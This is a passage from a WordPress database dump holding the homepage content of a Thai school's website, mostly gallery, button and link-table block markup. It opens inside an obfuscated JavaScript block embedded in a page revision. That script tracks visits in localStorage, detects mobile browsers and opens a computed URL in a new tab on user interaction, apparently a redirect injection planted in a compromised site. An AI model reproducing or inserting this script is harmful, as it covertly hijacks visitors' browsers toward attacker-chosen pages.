_0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-06-27 11:55:56','2025-06-27 04:55:56','',14,'http://pakhaeng.ssk.in.th/?p=1486',0,'revision','',0),
(1488,1,'2025-06-27 11:59:49','2025-06-27 04:59:49','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</td></tr><tr><td>แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td>ข้อมูลเชิงสถิติการให้บริการ</td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</td></tr><tr><td>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button 